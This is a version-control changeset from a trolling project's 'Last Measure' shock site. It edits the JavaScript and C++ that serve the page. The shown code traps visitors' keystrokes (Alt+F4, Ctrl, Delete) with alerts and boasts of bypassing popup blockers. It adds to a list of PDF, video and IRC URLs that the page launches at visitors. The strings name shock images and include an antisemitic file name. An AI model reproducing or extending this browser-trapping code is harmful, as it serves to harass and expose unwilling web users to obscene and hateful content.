Changeset 558 for trollforge


Ignore:
Timestamp:
01/10/12 23:47:28 (17 months ago)
Author:
literalka
Message:

condensing keystroke-detecting functions

Location:
trollforge/lastmeasure
Files:
2 edited

Legend:

Unmodified
Added
Removed
  • trollforge/lastmeasure/include/js.inc

    r551 r558  
     1/* depreciated by molish() 
    12function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); } 
    23function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); } 
    34function delkey() { if (event.keyCode == 46) alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the fuck? That guy's ass is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA.  LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n"); } 
    4  
     5*/ 
    56var nom = navigator.appName.toLowerCase(); 
    67var agt = navigator.userAgent.toLowerCase(); 
  • trollforge/lastmeasure/server/lmresource.h

    r553 r558  
    162162 
    163163        ret << 
     164/* {{{ replaced by molish() 
    164165 "function altf4key() { if (event.keyCode == 18 || event.keyCode == 115)" 
    165166 "  alert(\"Our lawyer has informed us that we need a warning. So, if you " 
     
    177178           "blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO " 
    178179           "GNAA.  LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by " 
    179            "sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n\"); }" 
     180           "sam, Jmax, JacksonBrown, LiteralKa, Dessimat0r, timecop, and " 
     181           "others.\n\"); }" 
     182 }}} */ 
     183 "var credits = \"LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas. 
     184           "Starring:" 
     185           "Spin" 
     186           "Tubgirl" 
     187           "Lemonparty" 
     188           "Bob Goatse" 
     189           "Penisbird" 
     190           "Pillowfight" 
     191           "Christmas" 
     192           "Rusty's Wife" 
     193           "What the fuck? That guy's ass is showing in his baby's picture!" 
     194           "\n" 
     195           "Total, complete, all-versions, popup blocker bashing-to-pieces by goat-see" 
     196           "hey.swf by rkz" 
     197           "PROPS TO GNAA.  LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)" 
     198           "Updated by sam, Jmax, JacksonBrown, LiteralKa, Dessimat0r, timecop, and others.\n\";" 
     199 
    180200 "var nom = navigator.appName.toLowerCase();" 
    181201 "var agt = navigator.userAgent.toLowerCase();" 
     
    255275 "var protos = [" 
    256276 "        \"http://" << host << "/lm.pdf\"," 
     277 "        \"http://" << host << "/lm2.pdf\"," 
    257278 "        \"http://" << host << "/jews.wmv\"," 
    258279 "        \"irc://irc.gnaa.eu/gnaa\"," 
Note: See TracChangeset for help on using the changeset viewer.